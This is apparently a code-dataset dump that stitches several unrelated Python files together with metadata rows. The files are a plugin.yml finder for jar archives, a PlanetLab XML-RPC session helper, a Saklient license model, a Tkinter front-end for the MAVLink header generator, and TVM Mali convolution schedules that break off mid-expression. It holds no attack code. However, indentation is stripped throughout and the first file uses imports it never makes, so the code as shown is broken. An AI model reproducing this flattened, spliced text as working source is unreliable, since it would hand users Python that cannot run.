import yaml
import sys
def find_plugin_yaml(dataobj):
'''
'''
yml = False
try:
# The first thing we are going to try to do is create a ZipFile
# object with the StringIO data that we have.
zfile = ZipFile(dataobj)
except:
print '[DEBUG] ZipFile Library Failed to Parse DataObject'
else:
# Before we start recursively jumping through hoops, lets first
# check to see if the plugin.yml exists at this level. If so, then
# just set the yaml variable. Otherwise we are gonna look for more
# zip and jar files and dig into them.
if 'plugin.yml' in zfile.namelist():
try:
yml = yaml.load(zfile.read('plugin.yml'))
except:
return False
else:
for filename in zfile.namelist():
if not yml and filename[-3:].lower() in ['zip', 'jar']:
print '[DEBUG] Found Zip/Jar file ' + filename
data = StringIO()
data.write(zfile.read(filename))
yml = find_plugin_yaml(data)
data.close()
zfile.close()
return yml
if __name__ == '__main__':
print yaml.dump(find_plugin_yaml(open(sys.argv[1], 'r'))) | mit | 4,808,092,771,281,465,000 | 36.05 | 79 | 0.518569 | false |
jheretic/operator | plsync/planetlab/session.py | 6 | 5328 | #!/usr/bin/env python
import ConfigParser
import getpass
import os
import sys
import xmlrpclib
import ssl
API_URL = "https://boot.planet-lab.org/PLCAPI/"
PLC_CONFIG="/etc/planetlab.conf"
SESSION_DIR=os.environ['HOME'] + "/.ssh"
SESSION_FILE=SESSION_DIR + "/mlab_session"
api = None
def setup_global_session(url, debug, verbose, plcconfig=None):
global api
global API_URL
API_URL=url
api = getapi(debug, verbose, plcconfig)
return api
def read_plc_config(filename):
""" Use python's ConfigParser() to extract user credentials from filename.
File should include:
[MyPLC]
username=
password=
Args:
filename - full path to config file
Returns:
(username, password) tuple
Raises:
ConfigParser.NoSectionError - when MyPLC section does not exist.
ConfigParser.NoOptionError - when value is not specified in section.
"""
config = ConfigParser.SafeConfigParser()
config.read(filename)
un = config.get("MyPLC", "username")
pw = config.get("MyPLC", "password")
return (un, pw)
class API:
def __init__(self, auth, url, debug=False, verbose=False):
self.debug = debug
self.verbose = verbose
self.auth = auth
self.api = get_xmlrpc_server(url)
def __repr__(self):
return self.api.__repr__()
def __getattr__(self, name):
run = True
if self.debug and 'Get' not in name:
# Do no run when debug=True & not a Get* api call
run = False
method = getattr(self.api, name)
if method is None:
raise AssertionError("method does not exist")
#if self.verbose:
# print "%s(%s)" % (name, params)
def call_method(auth, *params):
if self.verbose:
print "%s(%s)" % (name, params)
return method(self.auth, *params)
if run:
return lambda *params : call_method(self.auth, *params)
else:
print "DEBUG: Skipping %s()" % name
return lambda *params : 1
#return lambda *params : call_method(*params)
#return call_method(*params)
def refreshsession(plcconfig=None):
# Either read session from disk or create it and save it for later
if plcconfig is not None and os.path.exists(plcconfig):
print "Using credentials from: ", plcconfig
(username, password) = read_plc_config(plcconfig)
else:
print "PLC Username: ",
sys.stdout.flush()
username = sys.stdin.readline().strip()
password = getpass.getpass("PLC Password: ")
auth = {'Username' : username,
'AuthMethod' : 'password',
'AuthString' : password}
plc = API(auth, API_URL)
session = plc.GetSession(60*60*24*30)
try:
os.makedirs(SESSION_DIR)
except:
pass
session_map = parse_sessions(SESSION_FILE, fail_on_open=False)
session_map[API_URL] = session
write_sessions(SESSION_FILE, session_map)
def write_sessions(session_file, session_map):
f = open(SESSION_FILE, 'w')
for url in session_map.keys():
print >>f, url, session_map[url]
f.close()
def parse_sessions(session_file, fail_on_open=True):
try:
session_lines = open(SESSION_FILE, 'r').readlines()
except:
if fail_on_open:
# throw the error for someone else to catch
raise
else:
# return an empty map
return {}
session_map = {}
for line in session_lines:
f = line.strip().split()
if len(f) == 0:
continue
elif len(f) == 1:
print "old format session file: remove %s and rerun" % SESSION_FILE
sys.exit(1)
elif len(f) > 2:
print "too many fields in session line"
sys.exit(1)
else:
(url, session) = f
session_map[url] = session
return session_map
def get_xmlrpc_server(url):
try:
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
except AttributeError:
sys.stderr.write('WARNING: Using an unverified HTTPS context!!!\n')
sys.stderr.write('WARNING: Upgrade python to >= 2.7.9!!!\n')
raise
context.load_verify_locations(
os.path.join(os.path.dirname(os.path.realpath(__file__)),
"../../boot.planet-lab.org.ca"))
return xmlrpclib.ServerProxy(
url, verbose=False, allow_none=True, context=context)
def getapi(debug=False, verbose=False, plcconfig=None):
global api
api = get_xmlrpc_server(API_URL)
auth = None
authorized = False
while not authorized:
try:
auth = {}
auth['AuthMethod'] = 'session'
session_map = parse_sessions(SESSION_FILE)
auth['session'] = session_map[API_URL]
authorized = api.AuthCheck(auth)
if not authorized:
print "Need to refresh your PLC session file: %s" % SESSION_FILE
sys.stdout.flush()
refreshsession(plcconfig)
except:
print "Need to setup a new PLC session file: %s" % SESSION_FILE
sys.stdout.flush()
refreshsession(plcconfig)
assert auth is not None
return API(auth, API_URL, debug, verbose)
| apache-2.0 | -6,156,578,141,638,329,000 | 29.272727 | 80 | 0.588589 | false |
sakura-internet/saklient.python | saklient/cloud/models/model_license.py | 1 | 4572 | # -*- coding:utf-8 -*-
# This code is automatically transpiled by Saklient Translator
import six
from ..client import Client
from .model import Model
from ..resources.resource import Resource
from ..resources.license import License
from ...util import Util
import saklient
str = six.text_type
# module saklient.cloud.models.model_license
class Model_License(Model):
## ライセンスを検索・作成するための機能を備えたクラス。
## @private
# @return {str}
def _api_path(self):
return "/license"
## @private
# @return {str}
def _root_key(self):
return "License"
## @private
# @return {str}
def _root_key_m(self):
return "Licenses"
## @private
# @return {str}
def _class_name(self):
return "License"
## @private
# @param {any} obj
# @param {bool} wrapped=False
# @return {saklient.cloud.resources.resource.Resource}
def _create_resource_impl(self, obj, wrapped=False):
Util.validate_type(wrapped, "bool")
return License(self._client, obj, wrapped)
## 次に取得するリストの開始オフセットを指定します。
#
# @param {int} offset オフセット
# @return {saklient.cloud.models.model_license.Model_License} this
def offset(self, offset):
Util.validate_type(offset, "int")
return self._offset(offset)
## 次に取得するリストの上限レコード数を指定します。
#
# @param {int} count 上限レコード数
# @return {saklient.cloud.models.model_license.Model_License} this
def limit(self, count):
Util.validate_type(count, "int")
return self._limit(count)
## Web APIのフィルタリング設定を直接指定します。
#
# @param {str} key キー
# @param {any} value 値
# @param {bool} multiple=False valueに配列を与え、OR条件で完全一致検索する場合にtrueを指定します。通常、valueはスカラ値であいまい検索されます。
# @return {saklient.cloud.models.model_license.Model_License}
def filter_by(self, key, value, multiple=False):
Util.validate_type(key, "str")
Util.validate_type(multiple, "bool")
return self._filter_by(key, value, multiple)
## 次のリクエストのために設定されているステートをすべて破棄します。
#
# @return {saklient.cloud.models.model_license.Model_License} this
def reset(self):
return self._reset()
## 新規リソース作成用のオブジェクトを用意します。
#
# 返り値のオブジェクトにパラメータを設定し、save() を呼ぶことで実際のリソースが作成されます。
#
# @return {saklient.cloud.resources.license.License} リソースオブジェクト
def create(self):
return self._create()
## 指定したIDを持つ唯一のリソースを取得します。
#
# @param {str} id
# @return {saklient.cloud.resources.license.License} リソースオブジェクト
def get_by_id(self, id):
Util.validate_type(id, "str")
return self._get_by_id(id)
## リソースの検索リクエストを実行し、結果をリストで取得します。
#
# @return {saklient.cloud.resources.license.License[]} リソースオブジェクトの配列
def find(self):
return self._find()
## 指定した文字列を名前に含むリソースに絞り込みます。
#
# 大文字・小文字は区別されません。
# 半角スペースで区切られた複数の文字列は、それらをすべて含むことが条件とみなされます。
#
# @todo Implement test case
# @param {str} name
# @return {saklient.cloud.models.model_license.Model_License}
def with_name_like(self, name):
Util.validate_type(name, "str")
return self._with_name_like(name)
## 名前でソートします。
#
# @todo Implement test case
# @param {bool} reverse=False
# @return {saklient.cloud.models.model_license.Model_License}
def sort_by_name(self, reverse=False):
Util.validate_type(reverse, "bool")
return self._sort_by_name(reverse)
## @ignore
# @param {saklient.cloud.client.Client} client
def __init__(self, client):
super(Model_License, self).__init__(client)
Util.validate_type(client, "saklient.cloud.client.Client")
| mit | -4,517,385,638,724,693,000 | 28 | 99 | 0.632543 | false |
Nolan330/CS292 | mavgenerate.py | 9 | 7288 | #!/usr/bin/env python
"""\
generate.py is a GUI front-end for mavgen, a python based MAVLink
header generation tool.
Notes:
-----
* 2012-7-16 -- dagoodman
Working on Mac 10.6.8 darwin, with Python 2.7.1
* 2012-7-17 -- dagoodman
Only GUI code working on Mac 10.6.8 darwin, with Python 3.2.3
Working on Windows 7 SP1, with Python 2.7.3 and 3.2.3
Mavgen doesn't work with Python 3.x yet
* 2012-9-25 -- dagoodman
Passing error limit into mavgen to make output cleaner.
Copyright 2012 David Goodman ([email protected])
Released under GNU GPL version 3 or later
"""
import os
import re
import pprint
# Python 2.x and 3.x compatability
try:
from tkinter import *
import tkinter.filedialog
import tkinter.messagebox
except ImportError as ex:
# Must be using Python 2.x, import and rename
from Tkinter import *
import tkFileDialog
import tkMessageBox
tkinter.filedialog = tkFileDialog
del tkFileDialog
tkinter.messagebox = tkMessageBox
del tkMessageBox
sys.path.append(os.path.join('pymavlink','generator'))
from mavgen import *
DEBUG = False
title = "MAVLink Generator"
error_limit = 5
class Application(Frame):
def __init__(self, master=None):
Frame.__init__(self, master)
self.pack_propagate(0)
self.grid( sticky=N+S+E+W)
self.createWidgets()
self.pp = pprint.PrettyPrinter(indent=4)
"""\
Creates the gui and all of its content.
"""
def createWidgets(self):
#----------------------------------------
# Create the XML entry
self.xml_value = StringVar()
self.xml_label = Label( self, text="XML" )
self.xml_label.grid(row=0, column = 0)
self.xml_entry = Entry( self, width = 26, textvariable=self.xml_value )
self.xml_entry.grid(row=0, column = 1)
self.xml_button = Button (self, text="Browse", command=self.browseXMLFile)
self.xml_button.grid(row=0, column = 2)
#----------------------------------------
# Create the Out entry
self.out_value = StringVar()
self.out_label = Label( self, text="Out" )
self.out_label.grid(row=1,column = 0)
self.out_entry = Entry( self, width = 26, textvariable=self.out_value )
self.out_entry.grid(row=1, column = 1)
self.out_button = Button (self, text="Browse", command=self.browseOutDirectory)
self.out_button.grid(row=1, column = 2)
#----------------------------------------
# Create the Lang box
self.language_value = StringVar()
self.language_choices = [ "C", "Python", "CS", "Javascript", "WLua" ]
self.language_label = Label( self, text="Lang" )
self.language_label.grid(row=2, column=0)
self.language_menu = OptionMenu(self,self.language_value,*self.language_choices)
self.language_value.set(self.language_choices[0])
self.language_menu.config(width=10)
self.language_menu.grid(row=2, column=1,sticky=W)
#----------------------------------------
# Create the Protocol box
self.protocol_value = StringVar()
self.protocol_choices = [ "v0.9", "v1.0" ]
self.protocol_label = Label( self, text="Protocol")
self.protocol_label.grid(row=3, column=0)
self.protocol_menu = OptionMenu(self,self.protocol_value,*self.protocol_choices)
self.protocol_value.set(self.protocol_choices[1])
self.protocol_menu.config(width=10)
self.protocol_menu.grid(row=3, column=1,sticky=W)
#----------------------------------------
# Create the generate button
self.generate_button = Button ( self, text="Generate", command=self.generateHeaders)
self.generate_button.grid(row=4,column=1)
"""\
Open a file selection window to choose the XML message definition.
"""
def browseXMLFile(self):
# TODO Allow specification of multipe XML definitions
xml_file = tkinter.filedialog.askopenfilename(parent=self, title='Choose a definition file')
if DEBUG:
print("XML: " + xml_file)
if xml_file != None:
self.xml_value.set(xml_file)
"""\
Open a directory selection window to choose an output directory for
headers.
"""
def browseOutDirectory(self):
mavlinkFolder = os.path.dirname(os.path.realpath(__file__))
out_dir = tkinter.filedialog.askdirectory(parent=self,initialdir=mavlinkFolder,title='Please select an output directory')
if DEBUG:
print("Output: " + out_dir)
if out_dir != None:
self.out_value.set(out_dir)
"""\
Generates the header files and place them in the output directory.
"""
def generateHeaders(self):
# Verify settings
rex = re.compile(".*\\.xml$", re.IGNORECASE)
if not self.xml_value.get():
tkinter.messagebox.showerror('Error Generating Headers','An XML message defintion file must be specified.')
return
if not self.out_value.get():
tkinter.messagebox.showerror('Error Generating Headers', 'An output directory must be specified.')
return
if os.path.isdir(self.out_value.get()):
if not tkinter.messagebox.askokcancel('Overwrite Headers?','The output directory \'{0}\' already exists. Headers may be overwritten if they already exist.'.format(self.out_value.get())):
return
# Verify XML file with schema (or do this in mavgen)
# TODO write XML schema (XDS)
# Generate headers
opts = MavgenOptions(self.language_value.get(), self.protocol_value.get()[1:], self.out_value.get(), error_limit);
args = [self.xml_value.get()]
if DEBUG:
print("Generating headers")
self.pp.pprint(opts)
self.pp.pprint(args)
try:
mavgen(opts,args)
tkinter.messagebox.showinfo('Successfully Generated Headers', 'Headers generated succesfully.')
except Exception as ex:
exStr = formatErrorMessage(str(ex));
if DEBUG:
print('An occurred while generating headers:\n\t{0!s}'.format(ex))
tkinter.messagebox.showerror('Error Generating Headers','{0!s}'.format(exStr))
return
"""\
Format the mavgen exceptions by removing "ERROR: ".
"""
def formatErrorMessage(message):
reObj = re.compile(r'^(ERROR):\s+',re.M);
matches = re.findall(reObj, message);
prefix = ("An error occurred in mavgen:" if len(matches) == 1 else "Errors occured in mavgen:\n")
message = re.sub(reObj, '\n', message);
return prefix + message
# End of Application class
# ---------------------------------
"""\
This class mimicks an ArgumentParser Namespace since mavgen only
accepts an object for its opts argument.
"""
class MavgenOptions:
def __init__(self,language,protocol,output,error_limit):
self.language = language
self.wire_protocol = protocol
self.output = output
self.error_limit = error_limit;
# End of MavgenOptions class
# ---------------------------------
# ---------------------------------
# Start
if __name__ == '__main__':
app = Application()
app.master.title(title)
app.mainloop()
| lgpl-3.0 | 5,586,866,063,895,823,000 | 32.897674 | 198 | 0.608946 | false |
phisiart/tvm | topi/python/topi/mali/conv2d.py | 1 | 22691 | # pylint: disable=invalid-name,unused-variable,unused-argument,no-else-return
"""conv2d schedule on ARM Mali GPU"""
from __future__ import absolute_import as _abs
import numpy as np
import tvm
from .. import generic
from .. import util
from .. import tag
from ..nn import pad
from ..nn.conv2d import conv2d
from ..nn.util import get_pad_tuple
##### SCHEDULE UTILITIES #####
def fuse_and_bind(s, tensor, axis=None, num_thread=None):
""" fuse all the axis and bind to GPU threads """
axis = axis or s[tensor].op.axis
fused = s[tensor].fuse(*axis)
max_threads = tvm.target.current_target(allow_none=False).max_num_threads
bx, tx = s[tensor].split(fused, num_thread or max_threads)
s[tensor].bind(bx, tvm.thread_axis("blockIdx.x"))
s[tensor].bind(tx, tvm.thread_axis("threadIdx.x"))
return bx, tx
def tile_and_bind(s, tensor, y, x, y_factor, x_factor=None):
""" tile and bind to GPU threads """
x_factor = x_factor or y_factor
yo, xo, yi, xi = s[tensor].tile(y, x, y_factor, x_factor)
s[tensor].bind(xo, tvm.thread_axis("blockIdx.x"))
s[tensor].bind(xi, tvm.thread_axis("threadIdx.x"))
s[tensor].bind(yo, tvm.thread_axis("blockIdx.y"))
s[tensor].bind(yi, tvm.thread_axis("threadIdx.y"))
return yo, xo, yi, xi
def tile_and_bind3d(s, tensor, z, y, x, z_factor=2, y_factor=None, x_factor=None):
""" tile and bind 3d """
y_factor = y_factor or z_factor
x_factor = x_factor or y_factor
zo, zi = s[tensor].split(z, z_factor)
yo, yi = s[tensor].split(y, y_factor)
xo, xi = s[tensor].split(x, x_factor)
s[tensor].bind(zo, tvm.thread_axis("blockIdx.z"))
s[tensor].bind(zi, tvm.thread_axis("threadIdx.z"))
s[tensor].bind(yo, tvm.thread_axis("blockIdx.y"))
s[tensor].bind(yi, tvm.thread_axis("threadIdx.y"))
s[tensor].bind(xo, tvm.thread_axis("blockIdx.x"))
s[tensor].bind(xi, tvm.thread_axis("threadIdx.x"))
def pack_tensor(s, tensor, factor, readers):
""" do transform X[n, m] -> X[n / factor, m, factor] """
tmp = s.cache_read(tensor, 'global', readers)
y, x = s[tmp].op.axis
yo, yi = s[tmp].split(y, factor)
s[tmp].reorder(yo, x, yi)
s[tmp].compute_inline()
return s.cache_write(tmp, 'global')
def transpose(s, tensor, readers):
""" do transform X[n, m] -> X[m, n] """
tmp = s.cache_read(tensor, 'global', readers)
y, x = s[tmp].op.axis
s[tmp].reorder(x, y)
s[tmp].compute_inline()
return s.cache_write(tmp, "global"), tmp
def const_array(data, name):
""" convert an const array to tvm tensor"""
row, col = data.shape
dtype = str(data.dtype)
def select_array(i, j):
now = tvm.const(0.0, dtype)
for ii in range(row):
for jj in range(col):
now = tvm.select(tvm.all(i % row == ii, j % col == jj),
tvm.const(data[ii][jj], dtype),
now)
return now
return tvm.compute(data.shape, select_array, name=name)
@conv2d.register(["mali"])
def decl_conv2d(data, kernel, stride, padding, layout='NCHW', out_dtype='float32'):
"""Conv2D operator for ARM Mali GPU backend.
Parameters
----------
data : tvm.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
kernel : tvm.Tensor
4-D with shape [num_filter, in_channel, filter_height, filter_width]
stride : int or a list/tuple of two ints
stride size, or [stride_height, stride_width]
padding : int or a list/tuple of two ints
padding size, or [pad_height, pad_width]
layout : str
layout of data
Returns
-------
output : tvm.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
assert layout == 'NCHW', "only support NCHW convolution on mali"
assert data.shape[0].value == 1, "only support batch size=1 convolution on mali"
assert data.dtype == kernel.dtype, "Do not support inputs with different data types now."
out_dtype = data.dtype
HPAD, WPAD, _, _ = get_pad_tuple(padding, kernel)
kernel_shape = util.get_const_tuple(kernel.shape)
if isinstance(stride, (tuple, list)):
HSTR, WSTR = stride
else:
HSTR, WSTR = stride, stride
if (kernel_shape[2:4] == (3, 3) and (HPAD, WPAD) == (1, 1) and kernel_shape[0] >= 64 and
(HSTR, WSTR) == (1, 1)):
return _decl_winograd(data, kernel, stride, padding, layout, out_dtype)
elif kernel_shape[2:4] == (1, 1):
return _decl_im2col(data, kernel, stride, padding, layout, out_dtype)
else:
return _decl_spatialpack(data, kernel, stride, padding, layout, out_dtype)
@generic.schedule_conv2d_nchw.register(["mali"])
def schedule_conv2d_nchw(outs):
"""Schedule for conv2d_nchw for ARM Mali GPU
Parameters
----------
outs: Array of Tensor
The computation graph description of conv2d_nchw
in the format of an array of tensors.
Returns
-------
s: Schedule
The computation schedule for conv2d_nchw.
"""
outs = [outs] if isinstance(outs, tvm.tensor.Tensor) else outs
s = tvm.create_schedule([x.op for x in outs])
def traverse(op):
"""inline all one-to-one-mapping operators except the last stage (output)"""
if tag.is_broadcast(op.tag):
if op not in s.outputs:
s[op].compute_inline()
for tensor in op.input_tensors:
if tensor.op.input_tensors:
traverse(tensor.op)
if 'im2col_conv_output' in op.tag:
_schedule_im2col_conv2d(s, op)
if 'spatialpack_conv_output' in op.tag:
_schedule_spatialpack_conv2d(s, op)
if 'winograd_conv_output' in op.tag:
_schedule_winograd(s, op)
traverse(outs[0].op)
return s
def _decl_spatialpack(data, kernel, stride, padding, layout, out_dtype):
"""declare the spatialpack method (spatial packing) for conv2d"""
_, CI, IH, IW = [util.get_const_int(x) for x in data.shape]
CO, _, KH, KW = [util.get_const_int(x) for x in kernel.shape]
HPAD, WPAD, _, _ = get_pad_tuple(padding, kernel)
HCAT, WCAT = KH - 1, KW - 1
if isinstance(stride, (tuple, list)):
HSTR, WSTR = stride
else:
HSTR, WSTR = stride, stride
N = 1
TH = IH + 2*HPAD
TW = IW + 2*WPAD
OH = (IH + 2*HPAD - KH) // HSTR + 1
OW = (IW + 2*WPAD - KW) // WSTR + 1
DO_PAD = (HPAD != 0 and WPAD != 0)
if DO_PAD:
data_pad = pad(data, (0, 0, HPAD, WPAD), name="data_pad")
else:
data_pad = data
# set tunable parameters (tile factor, ...)
tune_config = getattr(tvm.target.current_target(), "tune_config", None)
if tune_config is None:
VH = 1
VW, VC = 4, 4
# correct tile factor
if OW % VW != 0:
if OW == 14:
VW = 2
VC = 8
elif OW == 7:
VW = 7
else:
VH = tune_config['VH']
VW = tune_config['VW']
VC = tune_config['VC']
if data.dtype == 'float16':
VC *= 2
assert CO % VC == 0
assert OH % VH == 0, "OH: %d VH : %d" % (OH, VH)
assert OW % VW == 0, "OW: %d VW : %d" % (OW, VW)
dvshape = (N, TH//(VH*HSTR), TW//(VW*WSTR), CI, VH*HSTR+HCAT, VW*WSTR+WCAT)
kvshape = (CO // VC, CI, KH, KW, VC)
ovshape = (N, CO // VC, OH // VH, OW // VW, VH, VW, VC)
oshape = (N, CO, OH, OW)
data_vec = tvm.compute(dvshape, lambda n, h, w, ci, vh, vw:
data_pad[n][ci][h*VH*HSTR+vh][w*VW*WSTR+vw],
name='data_vec')
kernel_vec = tvm.compute(kvshape, lambda co, ci, kh, kw, vc:
kernel[co*VC+vc][ci][kh][kw],
name='kernel_vec')
ci = tvm.reduce_axis((0, CI), name='ci')
kh = tvm.reduce_axis((0, KH), name='kh')
kw = tvm.reduce_axis((0, KW), name='kw')
conv = tvm.compute(ovshape, lambda n, co, h, w, vh, vw, vc:\
tvm.sum(data_vec[n, h, w, ci, vh*HSTR+kh, vw*WSTR+kw].astype(out_dtype) *
kernel_vec[co, ci, kh, kw, vc].astype(out_dtype),
axis=[ci, kh, kw]), name='conv')
output = tvm.compute(oshape, lambda n, co, h, w:
conv[n][co//VC][h/VH][w//VW][h%VH][w%VW][co%VC],
name='output_unpack', tag='spatialpack_conv_output')
return output
def _schedule_spatialpack_conv2d(s, op):
"""schedule the spatialpack method (spatial packing) for conv2d"""
# get ops and tensors
output = op.output(0)
output_height = util.get_const_int(output.shape[2])
conv = op.input_tensors[0]
data_vec = s[conv].op.input_tensors[0]
kernel_vec = s[conv].op.input_tensors[1]
data = s[data_vec].op.input_tensors[0]
kernel = s[kernel_vec].op.input_tensors[0]
# set tunable parameters (tile factor, ...)
tune_config = getattr(tvm.target.current_target(), "tune_config", None)
if tune_config is None:
num_thread = 8
out_channel = util.get_const_int(kernel.shape[0])
in_channel = util.get_const_int(kernel.shape[1])
in_width = util.get_const_int(data.shape[2])
if in_width >= 224:
pass
elif in_width >= 112:
pass
elif in_width >= 56:
if out_channel != in_channel:
num_thread = 16
elif in_width >= 28:
if out_channel >= 256:
num_thread = 16
elif in_width >= 14:
if in_channel == out_channel:
num_thread = 8
else:
num_thread = 4
else:
num_thread = tune_config["num_thread"]
last = 1
if output_height == 28:
last = 7
num_thread = 32
if data.dtype == 'float16' and (util.get_const_int(conv.shape[1]) == 4 or output_height == 28):
num_thread //= 2
# schedule padding
if isinstance(data.op, tvm.tensor.ComputeOp) and "pad" in data.op.tag:
data_pad = data
data = data_pad.op.input_tensors[0]
s[data_pad].compute_inline()
# schedule data packing
_, h, w, ci, vh, vw = s[data_vec].op.axis
tile_and_bind3d(s, data_vec, h, w, ci, 1)
s[data_vec].unroll(vw)
# schedule kernel packing
co, ci, kh, kw, vc = s[kernel_vec].op.axis
tile_and_bind(s, kernel_vec, co, ci, 1)
s[kernel_vec].unroll(kh)
s[kernel_vec].unroll(kw)
s[kernel_vec].vectorize(vc)
# schedule convolution
_, c, h, w, vh, vw, vc = s[conv].op.axis
kc, kh, kw = s[conv].op.reduce_axis
s[conv].reorder(_, c, h, w, vh, kc, kh, kw, vw, vc)
tile_and_bind3d(s, conv, c, h, w, num_thread, 1, last)
s[conv].unroll(kh)
s[conv].unroll(kw)
s[conv].unroll(vw)
s[conv].vectorize(vc)
# schedule output
if output.op not in s.outputs: # has bias
s[output].compute_inline()
output = s.outputs[0]
_, co, oh, ow = s[output].op.axis
tile_and_bind3d(s, output, co, oh, ow, num_thread, 1, last)
def _decl_im2col(data, kernel, stride, padding, layout='NCHW', out_dtype='float32'):
"""declare the Im2Col method for conv2d"""
_, CI, IH, IW = [x.value for x in data.shape]
CO, _, KH, KW = [x.value for x in kernel.shape]
HPAD, WPAD, _, _ = get_pad_tuple(padding, kernel)
if isinstance(stride, (tuple, list)):
HSTR, WSTR = stride
else:
HSTR, WSTR = stride, stride
N = 1
OH = (IH + 2*HPAD - KH) // HSTR + 1
OW = (IW + 2*WPAD - KW) // WSTR + 1
DO_PAD = (HPAD != 0 and WPAD != 0)
if DO_PAD:
data_pad = pad(data, (0, 0, HPAD, WPAD), name="data_pad")
else:
data_pad = data
ALIGN = 16
def upround(x, align):
return (x + align - 1) // align * align
# A [CO, CI * KH * KW]
reduce_len = upround(CI * KH * KW, ALIGN)
A = tvm.compute((upround(CO, ALIGN), reduce_len), lambda i, j:
kernel[i][j // KW // KH][j // KW % KH][j % KW], name='A')
# B [CI * KH * KW, N * OH * OW]
B = tvm.compute((reduce_len, upround(N * OH * OW, ALIGN)), lambda i, j:\
tvm.select(tvm.all(i < CI * KH * KW, j < N * OH * OW),
data_pad[j // (OH*OW)][i // (KH*KW)][j // OW % OH*HSTR + i // KW % KH]
[j % OW*WSTR + i % KW],
tvm.const(0, data_pad.dtype)), name='B')
gemm_n, gemm_l, gemm_m = A.shape[0], reduce_len, B.shape[1]
# C [CO, N * OH * OW]
k = tvm.reduce_axis((0, gemm_l), name='k')
C = tvm.compute((gemm_n, gemm_m), lambda i, j: tvm.sum(A[i, k] * B[k, j], axis=k), name='C')
# output
# the last term C[gemm_n-1, gemm_m-1] is for enabling the alignment,
# otherwise the alignment above will be eliminated by bound inference
output = tvm.compute((N, CO, OH, OW), lambda n, co, h, w:\
C[co][n * OW * OW + h * OW + w] + tvm.const(0, C.dtype) * C[gemm_n-1, gemm_m-1],
name='output', tag='im2col_conv_output')
return output
def _schedule_im2col_conv2d(s, op):
"""schedule the Im2Col method for conv2d"""
# get ops and tensors
output = op.output(0)
C = op.input_tensors[0]
A, B = C.op.input_tensors
kernel = A.op.input_tensors[0]
data = B.op.input_tensors[0]
# tuning parameter config
tune_config = getattr(tvm.target.current_target(), "tune_config", None)
if tune_config is None: # use rule
bn = 4
unroll_step = 16
total_work = util.get_const_int(C.shape[0] * C.shape[1])
reduce_work = util.get_const_int(A.shape[1])
if total_work > 200000:
last_work = util.get_const_int(C.shape[1])
if last_work > 10000:
num_thread = 16
elif last_work > 3000:
num_thread = 8
elif reduce_work > 100:
num_thread = 4
else:
num_thread = 2
if reduce_work < 50 and last_work < 30000:
num_thread = 4
elif total_work > 150000:
num_thread = 8
elif total_work > 50000:
num_thread = 4
else:
num_thread = 2
if num_thread == 4:
unroll_step = 2
else:
bn = tune_config["bn"]
num_thread = tune_config["num_thread"]
unroll_step = tune_config["unroll_step"]
bna = bnb = bn
num_thread1 = num_thread2 = num_thread
if data.dtype == 'float16':
bnb *= 2
last_work = util.get_const_int(C.shape[1])
if last_work % (bnb * num_thread2) != 0:
num_thread1 = num_thread * 2
num_thread2 = num_thread // 2
# schedule padding
if isinstance(data.op, tvm.tensor.ComputeOp) and "pad" in data.op.tag:
data_pad = data
s[data_pad].compute_inline()
##### SCHEDULE A #####
if util.get_const_int(kernel.shape[2]) == 1 and util.get_const_int(kernel.shape[3]) == 1:
s[A].compute_inline()
else:
y, x = s[A].op.axis
yo, xo, yi, xi = s[A].tile(y, x, bna, util.get_const_int(kernel.shape[3]))
s[A].vectorize(xi)
fuse_and_bind(s, A, [yo, xo])
# pack to vector form
packedA = pack_tensor(s, A, bna, [C])
# vectorize load
y, x = s[packedA].op.axis[:2]
tmp = s.cache_write(packedA, "local")
x, xt = s[packedA].split(x, bna)
_, _, _, xi = tile_and_bind(s, packedA, y, x, num_thread)
s[tmp].compute_at(s[packedA], xi)
s[tmp].vectorize(s[tmp].op.axis[1])
s[tmp].unroll(s[tmp].op.axis[2])
s[packedA].vectorize(s[packedA].op.axis[2])
s[packedA].unroll(xt)
##### SCHEDULE B #####
y, x = s[B].op.axis
yo, xo, yi, xi = s[B].tile(y, x, 1, 1 * bnb)
fuse_and_bind(s, B, [yo, xo])
# transpose and pack to vector form
B_transpose, B_tmp = transpose(s, B, [C])
s[B_transpose].compute_inline()
packedB = pack_tensor(s, B_transpose, bnb, [B_tmp])
# vectorize load
s[packedB].vectorize(s[packedB].op.axis[2])
y, x = s[packedB].op.axis[:2]
tile_and_bind(s, packedB, y, x, num_thread)
##### SCHEDULE C #####
# vectorize and unroll dot
y, x = s[C].op.axis
y, x, yt, xt = s[C].tile(y, x, bna, bnb)
k = s[C].op.reduce_axis[0]
s[C].reorder(k, yt, xt)
if unroll_step != 1:
k, k_unroll = s[C].split(k, unroll_step)
s[C].unroll(k_unroll)
s[C].unroll(yt)
s[C].vectorize(xt)
tile_and_bind(s, C, y, x, num_thread1, num_thread2)
##### COPY TO OUTPUT #####
if output.op in s.outputs: # no bias
output = output
else: # has bias
s[output].compute_inline()
output = s.outputs[0]
n, co, h, w = s[output].op.axis
h, w, vh, vw = s[output].tile(h, w, 1, bnb)
s[output].unroll(vh)
if util.get_const_int(s[output].op.output(0).shape[3]) % bnb != 0:
pass
else:
s[output].vectorize(vw)
fuse_and_bind(s, output, [n, co, h, w])
def _decl_winograd(data, kernel, stride, padding, layout, out_dtype):
"""declare winograd fast convolution F(2x2, 3x3) for conv2d"""
N, CI, H, W = [util.get_const_int(x) for x in data.shape]
CO, CI, KH, KW = [util.get_const_int(x) for x in kernel.shape]
HPAD, WPAD, _, _ = get_pad_tuple(padding, kernel)
if isinstance(stride, (tuple, list)):
HSTR, WSTR = stride
else:
HSTR, WSTR = stride, stride
assert HSTR == 1 and WSTR == 1 and HPAD == 1 and WPAD == 1 and KH == 3 and KW == 3
data_pad = pad(data, (0, 0, HPAD, WPAD), name="data_pad")
B_data = np.array([
[1, 0, 0, 0],
[0, 1, -1, 1],
[-1, 1, 1, 0],
[0, 0, 0, -1]
], out_dtype)
G_data = np.array([
[1, 0, 0],
[1.0/2, 1.0/2, 1.0/2],
[1.0/2, -1.0/2, 1.0/2],
[0, 0, 1],
], out_dtype)
A_data = np.array([
[1, 0],
[1, 1],
[1, -1],
[0, -1],
], out_dtype)
m = 2
r = 3
alpha = m + r - 1
K = CO
C = CI
nH, nW = (H + m-1) // m, (W + m-1) // m
P = N * nH * nW
bna, bnb = 4, 4
if data.dtype == 'float16':
bnb *= 2
P_round = (P + bnb - 1) // bnb * bnb
assert K % bna == 0 and P_round % bnb == 0
# pack input tile
input_tile = tvm.compute((C, P_round // bnb, alpha, alpha, bnb),
lambda c, b, eps, nu, bb:
